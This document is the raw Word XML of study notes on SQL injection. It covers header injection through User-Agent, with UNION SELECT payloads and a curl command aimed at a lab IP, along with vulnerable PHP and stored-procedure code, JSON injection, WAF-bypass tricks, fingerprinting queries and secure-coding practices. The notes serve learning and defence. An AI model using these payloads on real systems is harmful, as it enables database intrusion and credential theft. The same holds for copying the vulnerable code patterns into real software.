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3F95" w14:textId="62A2A35C" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Machine IP: 10.10.14.244</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBEEFF" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB1DCAD" w14:textId="6EC5688D" w:rsidR="00FA24B1" w:rsidRPr="002845BC" w:rsidRDefault="002845BC" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002845BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OTHER TECHNIQUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63880845" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D35A4D" w14:textId="763B7F1A" w:rsidR="00A83C3A" w:rsidRPr="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83C3A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Header Injection (User-Agent, Referer or X-Forwarded-For)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4910EAD6" w14:textId="413FA6A1" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent: ‘ OR 1=1; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BE2998" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E06D414" w14:textId="37538FD5" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ex: The web app logs User-Agent header from http requests into a table named logs in database. The web app provides an endpoint that displays all the logged entries from the logs table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8907C0" w14:textId="35F98E71" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00691DB3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.14.224/httpagent/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C091530" w14:textId="3F3F984B" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent: ‘ UNION SELECT username, password FROM user; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0EBA0" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DC7EDC" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRPr="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83C3A">
        <w:t>Here is the server-side code that inserts the logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FBAAA5" w14:textId="12E55FEA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$userAgent = $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE44FE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$insert_sql = "INSERT INTO logs (user_Agent) VALUES ('$userAgent')";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339C84C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if ($conn-&gt;query($insert_sql) === TRUE) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5E78C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 xml:space="preserve">    echo "&lt;p class='text-green-500'&gt;New logs inserted successfully&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550BAD4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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C301B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 xml:space="preserve">    echo "&lt;p class='text-red-500'&gt;Error: " . $conn-&gt;error . " (Error Code: " . $conn-&gt;errno . ")&lt;/p&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E5486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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD74EB" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRPr="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6B25D9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$sql = "SELECT * FROM logs WHERE user_Agent = '$userAgent'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297E4CE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>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683166C2" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRPr="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83C3A">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A401BF5" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRPr="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83C3A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78842EEF" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225BBFBF" w14:textId="5F7E82B3" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Preparing the payload: ‘ UNION SELECT username, password FROM user; #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78A146" w14:textId="752DDB49" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl -H “User-Agent: ‘ UNION SELECT username, password FROM user; # ” </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00D25EED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.14.224/httpagent/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C9C019A" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BD72DE" w14:textId="77777777" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2765B9" w14:textId="32157149" w:rsidR="00A83C3A" w:rsidRDefault="00A83C3A" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting Stored Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F47AD" w14:textId="048C46F4" w:rsidR="00A83C3A" w:rsidRDefault="00232638" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stored Procedures: routines stored in the database that can perform various operations, such as inserting, updating or querying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277B5F19" w14:textId="77777777" w:rsidR="00232638" w:rsidRDefault="00232638" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3D8E14" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>Consider a stored procedure designed to retrieve user data based on a username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038080DE" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> CREATE PROCEDURE sp_getUserData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC71D4" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">    @username NVARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B07C028" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2363BF56" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B00302" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">    DECLARE @sql NVARCHAR(4000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70497B" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">    SET @sql = 'SELECT * FROM users WHERE username = ''' + @username + ''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFC0CA" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">    EXEC(@sql)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453B557" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6087AE" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3441C3C0" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B552F17" w14:textId="2DB8D6F6" w:rsidR="00232638" w:rsidRDefault="00232638" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML and JSON Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D833139" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D045210" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">  "username": "admin' OR '1'='1--",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD217B" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t xml:space="preserve">  "password": "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A3437" w14:textId="77777777" w:rsidR="00232638" w:rsidRPr="00232638" w:rsidRDefault="00232638" w:rsidP="00232638">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61193EB2" w14:textId="794213A9" w:rsidR="00232638" w:rsidRDefault="00232638" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166C3267" w14:textId="77163F45" w:rsidR="00232638" w:rsidRDefault="00232638" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00232638">
        <w:t>If the application uses these values directly in a SQL query like SELECT * FROM users WHERE username = 'admin' OR '1'='1'-- AND password = 'password', it could result in an injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CADA7CB" w14:textId="77777777" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6B51D3" w14:textId="51D5CDD5" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AUTOMATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF03A77" w14:textId="2A075372" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="00A83C3A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Major Issues During Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26992AEB" w14:textId="3D39ED54" w:rsidR="002845BC" w:rsidRPr="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845B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Dynamic Nature of SQL Queries;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204E9E5" w14:textId="01B0823C" w:rsidR="002845BC" w:rsidRPr="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845B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Variety of Injection Points (input fields, HTTP headers, URL parameters);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ACBD54" w14:textId="0C86F782" w:rsidR="002845BC" w:rsidRPr="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845B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Use of Security Measures (prepared statements, parametrized queries and ORM frameworks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB5B60" w14:textId="096167FE" w:rsidR="002845BC" w:rsidRPr="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845B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Context-Specific Detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311A472" w14:textId="77777777" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000354CE" w14:textId="328EC557" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Few Important Tools for detecting and exploiting SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4AD57" w14:textId="0FDB6F46" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>SQLMap – open-source, web app;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299465F9" w14:textId="289B2C6A" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>SQLNinja – web app that use Microsoft SQL Server;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2612A0" w14:textId="0DCF3272" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>JSQL Injection – Java library, java apps;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D0597" w14:textId="439A2F02" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>BBQSQL – Blind SQLi framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49AD1D" w14:textId="77777777" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9750A4" w14:textId="77777777" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113CDDFC" w14:textId="0AF9858B" w:rsidR="002845BC" w:rsidRDefault="002845BC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BEST PRACTICES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4B517" w14:textId="137FCA19" w:rsidR="002845BC" w:rsidRDefault="008126DC" w:rsidP="002845BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECURE CODERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC5332" w14:textId="441546FD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Parameterised Queries and Prepared Statement;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B53E07" w14:textId="250A9E4B" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ex: in PHP, with PDO: $stmt = $pdo-&gt;prepare(“SELECT * FROM users WHERE username = :username”); $stmt-&gt;execute([‘username’ =&gt; $username]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50519FD7" w14:textId="77777777" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52311DF1" w14:textId="6C0D5589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Input Validation and Sanitisation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07612447" w14:textId="63C0AC51" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Htmlspecialchars(), filter_var() – to validate data types, lengths and ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234C6C0" w14:textId="77777777" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202F45E9" w14:textId="74787FEB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Least Privilege Principle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49193A39" w14:textId="28375745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Stored Procedures;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E9F8F" w14:textId="29991513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Regular Security Audits and Code Reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B382601" w14:textId="77777777" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CC4D9A" w14:textId="462F1DE8" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PENTESTERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441160A" w14:textId="46EF0C66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Exploiting Database-Specific Features (understand the specifics of the target DBMS – MySQL, PostgreSQL, Oracle or MSSQL – supports the xp_cmdshell);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41287E13" w14:textId="54C786D6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Leveraging Error Messages (1’ AND 1=CONVERT(int, (SELECT @@version)) --);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02030BBB" w14:textId="511D1A43" w:rsidR="008126DC" w:rsidRDefault="008126DC" w:rsidP="008126DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bypassing WAF and filters (SeLeCt</w:t>
      </w:r>
      <w:r w:rsidR="002E714D">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>CONCAT(CHAR(83),CHAR(69),CHAR(76),CHAR(</w:t>
      </w:r>
      <w:r w:rsidR="002E714D">
        <w:t>69</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002E714D">
        <w:t>,CHAR(67),CHAR(84)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002E714D">
        <w:t>; hex, URL encoding, inline commnets /**/, different character encodings %09, %0A</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1CAACF" w14:textId="551186AD" w:rsidR="002E714D" w:rsidRDefault="002E714D" w:rsidP="008126DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Database Fingerprinting (SELECT version() – PostgreSQL; SELECT @@version – MySQL and MSSQL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D6206" w14:textId="29979D59" w:rsidR="002E714D" w:rsidRPr="008126DC" w:rsidRDefault="002E714D" w:rsidP="008126DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pivoting with SQLi.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002E714D" w:rsidRPr="00812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81256"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9CE0ABC6"/>
    <w:lvl w:ilvl="0" w:tplc="FB00B8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7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89"/>
    <w:rsid w:val="00232638"/>
    <w:rsid w:val="002845BC"/>
    <w:rsid w:val="002E714D"/>
    <w:rsid w:val="003206CD"/>
    <w:rsid w:val="003E28F2"/>
    <w:rsid w:val="00662B9B"/>
    <w:rsid w:val="00694B81"/>
    <w:rsid w:val="006B1C89"/>
    <w:rsid w:val="008126DC"/>
    <w:rsid w:val="0082646E"/>
    <w:rsid w:val="00A83C3A"/>
    <w:rsid w:val="00DC0E60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3CC4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A3057907-CFD5-450A-8AB5-86A617E9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C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0.14.224/httpagent/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.224/httpag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2025-04-24T08:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T09:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>